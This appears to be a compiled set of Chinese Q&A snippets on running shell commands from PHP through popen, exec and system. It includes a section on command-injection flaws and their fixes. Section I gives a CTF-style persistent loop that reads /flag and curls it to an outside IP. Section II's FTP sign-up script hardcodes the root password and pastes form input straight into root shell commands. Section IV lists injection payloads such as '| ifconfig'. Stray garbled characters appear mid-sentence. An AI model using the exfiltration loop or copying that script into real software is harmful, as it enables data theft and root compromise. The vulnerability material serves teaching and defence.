popen函数php

Ⅰ php执行外部命令，如何不等待返回结果

pclose(popen('command &', 'r'));
感谢楼上的朋友。亲测有效，在linux中需要让程序在后台运行才可以，因此必须加&，例如：
pclose(popen("{ while true;do echo 123;sleep 5;done;}&", r));
这条命令注意 { 后面有一个空格。玩awd攻防赛的朋友可以靠这种方式种一个不死的子进程，不断发送flag给服务器：
pclose(popen("{ while true;do curl http://192.168.62.1/?flag=`cat /flag`;sleep 5;done;}&", 'r'));

Ⅱ 用PHP实现Ftp用户的在线管理

领导要我策划一个网页设计大赛和Flash创作大赛，要求必须实现在线报名和上传作品。通过FreeBSD+Apache+PHP+Mysql+FTP我实现了该要求。
实现在线报名和上传作品的思路是利用网页表单收集用户填写的资料存储到Mysql数据库内，同时以该用户的注册名创建一个FTP上传账号并创建该用户的相应目录。
Ftp服务器是系统默认带的，采用系统用户的用户名和密码，创建系统用户就等于创建FTP用户，FreeBSD是属于UNIX阵营的操作系统，它没有象Linux一样的useradd和groupadd等创建用户和组的命令，其取而代之的是pw命令加上相应参数来实现，在Freebsd上以管理员的身份创建一个用户的命令是
以下是引用片段：
echo | pw useradd [-g][groupname] [-s][shelldir][-h 0]
参数g指定用户组，参数s指定用户的shell。
如果是普通用户登陆颂凯慧的话还必须用到su命令，调用的方法是
以下是引用片段：
su root _c ‘echo | pw useradd [-g][groupname] [-s][shelldir][-h 0] ’
执行之后系统会要求输入管理员密码，输入密码就可以以管理员的身份野答执行这个命令了。
实现这步操作的主要难点在于如何通过PHP来调用上面这些系统命孙答令去创建一个用户，本例是使用PHP中的popen()函数来实现的，该函数执行指令打开文件，语法是int popen(string command, string mode)，其打开的文件只能是单向的，只能读或只能写，对应的“string mode”为’r’或’w’，“string command” 就是命令字符串，在对文件的操作上可使用 fgets()、fgetss()与fputs()函数，本例用fputs()函数往文件里面输入管理员密码。若是开档发生错误将返回 false 值，最后函数要记得调用pclose()关闭。
下面我们来规划一下FTP用户的组，事先我们先用pw groupadd ftpuser创建ftpuse组，让在线申请的用户为这个组的成员。为了安全起见，我们不应该给FTP用户Telnet权限，所以我们还要专门给他们创建一个shell，使得他们不能通过Telnet正常登陆系统，方法如下：先创建一个文件/bin/ftponly
以下是引用片段：
#!/bin/csh
/bin/cat
XX
You can ony use this username to login ftp server!
And you can not use it to telnet to this system! XX
sleep 10
该文件中XX之间就是显示给用telnet登陆的用户看的信息。信息显示10秒钟就自动退出了。最后不要忘记用chmod +x /bin/ftponly给这个文件可执行属性。
然后在/bin/shell文件中添加“/bin/ftponly”，在以后的命令里面我们就可以利用pw中-s参数把这个shell指定给FTP用户了。
最后还要注意一个问题，su命令仅仅是wheel管理组的用户成员才可以使用，当PHP调用su命令的时候也必须以wheel组成员的身份运行，否则系统拒绝运行，而PHP运行系统命令的身份就是Apache Web服务器运行的身份，初始的用户名和用户组都是nobody，所以先得建立一个wheel组的用户www供apache使用，接着更改Apache的配置文件httpd.conf中的user为www，group为wheel，重新启动Apache，就可以以新用户身份运行了。
下面可以创建PHP源文件checkin.php了，代码如下：
以下是引用片段：
?if (($username!="") and ($userpasswd!=""))//判断是否有表单提交了信息
{ $rootpasswd="adminpassword"; //定义管理员密码
$creatuser ="su --login root -c 'echo ".$userpasswd." | pw useradd ".$username." -s /bin/ftponly -g ftpuser _s /bin/ftponly -h 0' "; //这是利用su和pw命令创建用户的用到的字符串
$fp=popen($creatuser,"w"); //调用popen()函数执行字符串中的命令，返回文句柄给$fp
fputs($fp,$rootpasswd); //写入管理员密码到文件$fp，相当于输入密码给系统
pclose($fp);//关闭文件
$creatdir="su --login root -c 'mkdir /home/".$username."'";//创建用户目录的命令字符串
$fp=popen($creatdir,"w");//执行命令创建用户目录
fputs($fp,$rootpasswd); //输入管理员密码
pclose($fp);
$creatdir="su --login root -c 'mkdir /home/".$username."/public_html'";
$fp=popen($creatdir,"w"); //执行命令创建用户网站根目录
fputs($fp,$rootpasswd); //输入管理员密码
pclose($fp);
$creatdir="su --login root -c 'chown ".$username." /home/".$username."'"; //改变用户目录的所有者为用户自己，初始为运行Apache的用户www。
$fp=popen($creatdir,"w"); //执行命令
fputs($fp,$rootpasswd); //输入管理员密码
pclose($fp);
$creatdir="su --login root -c 'chown ".$username." /home/".$username."/public_html'"; //改变网站根目录的归属
$fp=popen($creatdir,"w");
fputs($fp,$rootpasswd);
pclose($fp);
echo "恭喜".$username."，您的的FTP账号已经申请成功！请到FTP上登陆，请注意，您没有Telnet权限";}
else{?
html
head
title申请FTP账号/title
meta http-equiv="Content-Type" content="text/html; charset=gb2312"
/head
body bgcolor="#FFFFFF"
div align="center"
p申请FTP账号/p
form method=POST action="? echo $PHP_SELF; ?"
table width="36%" border="0"
tr
td width="40%"
div align="right"账号名称:/div
/td
td width="60%"
input type="text" name="username"
/td
/tr
tr
td width="40%"
div align="right"密码:/div
/td
td width="60%"
input type="password" name="userpasswd"
/td
/tr
tr
td colspan="2"input type="submit" name="Submit" value="申请"/td
/tr
/table
/form
/div?}?
/body
/html

Ⅲ PHP执行linux系统命令

首先先要给大家介绍PHP执行linux系统命令的几个基本函数 我曾经很长一段时间都分不清下面几个函数的具体用法区别 system函数 说明 执行外部程序并显示输出资料 语法 string system(string mand int [return_var]); 返回值: 字符串 详细介绍 本函数就像是 C 语中的函数 system() 用来执行指令 并输出结果 若是 return_var 参数存在 则执行 mand 之后的状态会填入 return_var 中 同样值得注意的是若需要处理用户输入的资料 而又要防止用户耍花招破解系统 则可以使用 EscapeShellCmd() 若 PHP 以模块式的执行 本函数会在每一行输出后自动更新 Web 服务器的输出缓冲暂存区 若需要完整的返回字符串 且不想经过不必要的其它中间的输出界面 可以使用 PassThru() 实例代码

exec函数 说明 执行外部程序 语法 string exec(string mand string [array] int [return_var]); 返回值: 字符串 详细介绍 本函数执行输入 mand 的外部程序或外部指令 它的返回字符串只是外部程序执行后返回的最后一行 若需要完整的返回字符串 可以使用 PassThru() 这个函数 要是参数 array 存在 mand 会将 array 加到参数中执行 若不欲 array 被处理 可以在执行 exec() 之前呼叫 unset() 若是 return_var 跟 array 二个参数都存在 则执行 mand 之后的状态会填入 return_var 中 值得注意的是若需要处理使用者输入的资料 而又要防止使用者耍花招破解系统 则可以使用 EscapeShellCmd() 实例代码

Ⅳ php执行linux命令并输出终端屏幕显示的内容（实时）

PHP在linux上执行命令

目录：
一、PHP中调用外部命令介绍
二、关于安全问题
三、关于超时问题
四、关于PHP运行linux环境中命令出现的问题

一、PHP中调用外部命令介绍
在PHP中调用外部命令，可以用，1>调用专门函数、2>反引号、3>popen()函数打开进程，三种方法来实现：

方法一：用PHP提供的专门函数（四个）：
PHP提供4个专门的执行外部命令的函数：exec(), system(), passthru(), shell_exec()
1）exec()
原型: string exec ( string $command [, array &$output [, int &$return_var ］ )
说明: exec执行系统外部命令时不会输出结果，而是返回结果的最后一行。如果想得到结果，可以使用第二个参数，让其输出到指定的数组。此数组一个记录代表输出的一行。即如果输出结果有20行，则这个数组就有20条记录，所以如果需要反复输出调用不同系统外部命令的结果，最好在输出每一条系统外部命令结果时清空这个数组unset($output)，以防混乱。第三个参数用来取得命令执行的状态码，通常执行成功都是返回0。
<?php
exec("dir",$output);
print_r($output);
?>

2）system()
原型: string system ( string $command [, int &$return_var ] )
说明: system和exec的区别在于，system在执行系统外部命令时，它执行给定的命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。
<?php
system("pwd",$result);
print $result;//输出命令的结果状态码
?>
关于第二个参数结果状态码的简单介绍：
如果返回0是运行成功，
在Bash中，当错误发生在致命信号时，bash会返回128+signal number做为返回值。
如果找不到命令，将会返回127。
如果命令找到了，但该命令是不可执行的，将返回126。
除此以外，Bash本身会返回最后一个指令的返回值。
若是执行中发生错误，将会返回一个非零的值。
Fatal Signal : 128 + signo
Can't not find command : 127
Can't not execute : 126
Shell script successfully executed : return the last command exit status
Fatal ring execution : return non-zero

3）passthru()
原型: void passthru ( string $command [, int &$return_var ] )
说明: passthru与system的区别，passthru直接将结果输出到游览器，不返回任何值，且其可以输出二进制，比如图像数据。第二个参数可选，是状态码。
<?php
header("Content-type:image/gif");
passthru("/usr/bin/ppm2tiff /usr/share/tk8.4/demos/images/teapot.ppm");
?>

4）shell_exec()
原型: string shell_exec ( string $cmd )
说明: 直接执行命令$cmd
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>

方法二：反撇号
原型: 反撇号`（和~在同一个键）执行系统外部命令
说明: 在使用这种方法执行系统外部命令时，要确保shell_exec函数可用，否则是无法使用这种反撇号执行系统外部命令的。
<?php
echo `dir`;
?>

方法三：用popen()函数打开进程
原型: resource popen ( string $command , string $mode )
说明: 能够和命令进行交互。之前介绍的方法只能简单地执行命令，却不能与命令交互。有时须向命令输入一些东西，如在增加系统用户时，要调用su来把当前用户换到root用户，而su命令必须要在命令行上输入root的密码。这种情况下，用之前提到的方法显然是不行的。
popen( )函数打开一个进程管道来执行给定的命令，返回一个文件句柄，可以对它读和写。返回值和fopen()函数一样，返回一个文件指针。除非使用的是单一的模式打开(读or写)，否则必须使用pclose()函数关闭。该指针可以被fgets(),fgetss(),fwrite()调用。出错时，返回FALSE。
<?php
error_reporting(E_ALL);

/* Add redirection so we can get stderr. */
$handle = popen('/path/to/executable 2>&1', 'r');
echo "'$handle'; " . gettype($handle) . "\n";
$read = fread($handle, 2096);
echo $read;
pclose($handle);
?>

Ⅳ 命令执行漏洞

命令执行漏洞的成因：

脚本语言(如PHP )优点是简洁、方便,但也伴随着一些问题,如速度慢、无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要-些除去web的特殊功能时,就需要调用一些外部程序。当应用需要调用一些外部程序去处理内容的情况下, 就会用到些执行系统命令桐漏的函数。如PHP中裤岩的system、exec. shell exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶局纯烂意系统命令到正常命令中,造成命令执行攻击。

PHP中调用外部程序的主要有以下函数：

system

exec

shell_exec

passthru

popen

proc_popen

全局搜索这些函数，观察是否可以控制。

命令执行漏洞的防御：

可控点为待执行的程序

<?php

$arg = $_GET[‘cmd’];

if($arg){

system(“$arg”);

}

?>

[if !supportLists]l [endif]/?cmd=id

[if !supportLists]l [endif]/?cmd=pwd

[if !supportLists]l [endif]/?cmd=ifconfig

可控点是传入程序的整个参数（无引号包裹）

<?php

$arg = $_GET[‘cmd’];

if($arg){

system(“ping -c 3 $arg”);

}

?>

我们能够控制的点是程序的整个参数，我们可以直接用&&或|等等，利用与、或、管道命令来执行其他命令。

/?cmd=127.0.0.1| ifconfig

可控点是某个参数的值（有双引号包裹）

<?php

$arg = $_GET[‘cmd’];

if($arg){

system(“ls -al \”$arg\””);

}

?>

闭合双引号。

/?cmd=/home” | ifconfig;”

可控点是某个参数的值（有单引号包裹）

<?php

$arg = $_GET[‘cmd’];

if($arg){

system(“ls -al  ‘$arg’ ”);

}

?>

在单引号内的话，只是一个字符串，因此想要执行命令必须闭合单引号。

/cmd?=/home’ |ifconfig’

命令执行漏洞的防御：

1、能使用脚本解决的工作,不要调用其他程序处理。尽量少用执行命令的函数,并在disable functions中禁用之。

2、对于可控点是程序参数的情况，使用escapeshellcmd函数进行过滤。

3、对于可控点是程序参数的值的情况，使用escapeshellarg函数进行过滤。

4、参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义。

Ⅵ PHP exec() 运行另一个php文件，不等待返回值

可以后台运行，但是建议使用popen和pclose代替exec。同时需要注意php是否添加了环境变量。

<?php
//windows和linux下后台执行方式
$cmd='php2.php';
if(strtoupper(substr(PHP_OS,0,3))=='WIN')
{
	pclose(popen('start/B'.$cmd,'r'));
}else
{
	pclose(popen($cmd.'>/dev/null&','r'));
}